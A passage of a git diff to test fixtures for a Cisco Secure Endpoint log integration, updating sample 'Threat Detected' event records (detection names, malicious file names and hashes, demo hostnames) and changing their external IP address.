Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:32.898252Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3840,7 +3750,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log index 4a0581fcd4d..33c5b6791ea 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log @@ -1,45 +1,45 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 